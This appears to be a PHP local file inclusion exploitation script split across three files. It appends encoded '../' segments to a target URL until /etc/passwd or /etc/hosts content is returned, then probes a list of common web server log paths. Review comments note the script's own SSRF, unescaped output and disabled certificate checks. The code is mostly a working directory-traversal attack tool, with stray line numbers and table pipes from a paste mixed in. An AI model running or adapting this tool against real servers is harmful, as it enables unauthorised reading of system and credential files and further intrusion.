//Lfi.php - Main file

<?php

//LFI exploitation script
// Entry point. Takes the target URL from the 'u' query parameter, appends
// "..%2F" once per iteration and asks searchPasswd()/searchHosts() (funcs.php)
// whether the response now looks like a file under the filesystem root; on the
// first hit it prints the URL(s) that matched, runs testLogs() over the list in
// dirs.php and exits.
//
// NOTE(review): this page is itself an SSRF primitive — $_GET['u'] is handed
// unvalidated to cURL in funcs.php, so whoever can reach this script can make
// the hosting server fetch arbitrary URLs. Keep it off any reachable web root,
// or gate it behind authentication and a scheme/host allow-list.
// NOTE(review): the matched URLs are echoed without htmlspecialchars(), so the
// request-controlled 'u' value is reflected into the HTML response unescaped.

require("funcs.php");
require("dirs.php");
$url = $_GET['u']; // no validation; a missing 'u' raises an undefined-index notice/warning

define(LIM, 10); //Limit of ../ to check
define(RET, "..%2F");
// NOTE(review): LIM and RET are bare identifiers, not quoted strings. PHP < 8
// warns and substitutes the strings 'LIM'/'RET', which is what define() needs,
// so the script happens to work there; PHP 8 throws an undefined-constant Error
// on these two lines before the loop runs.

$toInject = $url;



//Main loop to append ../
// $c runs 1..LIM-1, so at most nine "..%2F" segments are tried, not LIM.
for($c = 1; $c < LIM; $c++){
$toInject = $toInject.RET; //Url with ../ appended

$passwdTest = searchPasswd($toInject); //Look for etc/passwd
$hostsTest = searchHosts($toInject); //Look for etc/hosts

// Each helper returns the URL it requested on a match and null otherwise,
// so this is a plain truthiness test on two strings.
if($passwdTest || $hostsTest){
echo $passwdTest." ".$hostsTest; // reflected into the page unescaped (see note above)
testLogs($toInject, $logsDir); // $logsDir is the array defined in dirs.php
die;
}

}

?>
34 | ||
35 | //funcs.php - Functions file | |
36 | ||
37 | <?php | |
38 | ||
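//This functions returns body of $url
// Fetches $url with cURL and returns the raw response as a string, or false
// when the request failed (CURLOPT_FAILONERROR turns HTTP >= 400 into a
// failure). The returned string starts with the response headers because
// CURLOPT_HEADER is on; redirects are followed; CURLOPT_VERBOSE writes a
// connection trace to stderr.
//
// NOTE(review): $ua is never assigned in the visible files, so the User-Agent
// option receives null (presumably no/empty User-Agent header) — confirm
// against the caller or define it before use.
// NOTE(review): CURLOPT_SSL_VERIFYPEER=false disables certificate validation,
// so an on-path party can substitute the response; re-enable it unless the
// target genuinely uses an untrusted certificate.
function getBody($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $ua);
    curl_setopt($ch, CURLOPT_FAILONERROR, True);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
    curl_setopt($ch, CURLOPT_AUTOREFERER, True);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_ENCODING, '');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

    $body = curl_exec($ch);
    curl_close($ch); // release the handle; it was leaked on every call before

    return $body;
}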
58 | ||
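//This functions returns response size
// Issues the same request as getBody() but returns only cURL's size_download
// (bytes received, int or float depending on the PHP/cURL build) and discards
// the body. When the request fails the value is whatever cURL reports,
// presumably 0.
//
// NOTE(review): $ua is never assigned in the visible files — confirm against
// the caller or define it before use.
// NOTE(review): certificate validation is disabled (CURLOPT_SSL_VERIFYPEER=false);
// see getBody().
function getResponseSize($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_VERBOSE, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, $ua);
    curl_setopt($ch, CURLOPT_FAILONERROR, True);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
    curl_setopt($ch, CURLOPT_AUTOREFERER, True);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_ENCODING, '');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

    curl_exec($ch);
    $info = curl_getinfo($ch); // must be read before the handle is closed
    curl_close($ch); // release the handle; it was leaked on every call before

    return $info['size_download'];
}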
79 | ||
//This functions checks if /etc/passwd is accessible
// Requests $url."etc/passwd" via getBody() and returns the requested URL when
// the response contains the root account line; otherwise execution falls off
// the end and the function returns null. Lfi.php treats the result as a boolean.
function searchPasswd($url){
$passwd = "etc/passwd";
$nb = "%00"; // URL-encoded NUL; never appended (suffix below is commented out), so unused
$toReq = $url.$passwd;//.$nb;
$root = "root:x:0:0:root:/root:/bin/bash";
$body = getBody($toReq);
//echo $toReq."<br>";

// strpos() is used as a boolean. A false body from getBody() therefore counts
// as "not found"; a match at offset 0 cannot occur here because getBody()
// prepends the response headers.
if(strpos($body, $root)) return $toReq;//echo $toReq."<br>";


}
93 | ||
//This functions checks if /etc/hosts is accessible
// Requests $url."etc/hosts" via getBody() and returns the requested URL when
// the response contains both "127.0.0.1" and "localhost"; otherwise execution
// falls off the end and the function returns null. Lfi.php treats the result
// as a boolean.
function searchHosts($url){
$hosts = "etc/hosts";
$nb = "%00"; // URL-encoded NUL; never appended (suffix below is commented out), so unused
$toReq = $url.$hosts;//.$nb;

$ip = "127.0.0.1";
$host = "localhost";
$body = getBody($toReq);


// Both strpos() results are used as booleans; a false body from getBody()
// counts as "not found" (offset 0 cannot occur because the headers come first).
if(strpos($body, $ip) && strpos($body, $host)) return $toReq;//echo $toReq."<br>";

}
108 | ||
// Prints, one per line, the response size of $url with each candidate log
// path from dirs.php appended. Nothing is compared or returned; the sizes are
// left for the operator to read. Every entry triggers one outbound request.
//
// NOTE(review): $logsDir is taken by reference but never modified — by-value
// would do. $url ultimately comes from $_GET['u'] in Lfi.php and is only used
// as a request target here, not echoed.
function testLogs($url, &$logsDir){
echo "<br>";
foreach ($logsDir as $dir):
$currentTest = $url.$dir; //Url with returns with log appended
echo getResponseSize($currentTest)."<br>";
endforeach;
}
116 | ?> | |
117 | ||
118 | //dirs.php - This file contains common Apache directories | |
119 | ||
120 | <?php | |
121 | ||
//This file contains an array with common logs directories
// Candidate log-file paths, written relative to the filesystem root (no
// leading '/'), that testLogs() appends to the traversal prefix. Despite the
// file header, the list is not Apache-only: nginx and php-fpm/php-fcgi
// locations are included as well. Each entry costs one outbound request.
$logsDir = array('error.log',
'error_log',
'etc/httpd/conf/logs/error_log',
'etc/httpd/logs/error_log',
'home/php5/logs/error_log',
'log/error.log',
'log/error_log',
'logs/error.log',
'logs/error_log',
'usr/local/apache/error.log',
'usr/local/apache/log/error_log',
'usr/local/apache/logs/error_log',
'usr/local/apache2/log/error_log',
'usr/local/apache2/logs/access_log',
'usr/local/apache2/logs/error.log',
'usr/local/apache2/logs/error_log',
'usr/local/apachessl/logs/error_log',
'usr/local/httpd/log/error_log',
'usr/local/httpd/logs/error_log',
'usr/local/php/log/error_log',
'var/apache2/logs/access_log',
'var/apache2/logs/error_log',
'var/log/apache/error_log',
'var/log/apache2/access.log',
'var/log/apache2/access_log',
'var/log/apache2/error.log',
'var/log/apache2/error_log',
'var/log/httpd-access.log',
'var/log/httpd-error.log',
'var/log/httpd/access_log',
'var/log/httpd/error_log',
'var/log/nginx/error.log',
'var/log/php-fcgi/error_log',
'var/log/php-fpm/err.log',
'var/www/logs/access_log',
'var/www/logs/error_log');
159 | ?> |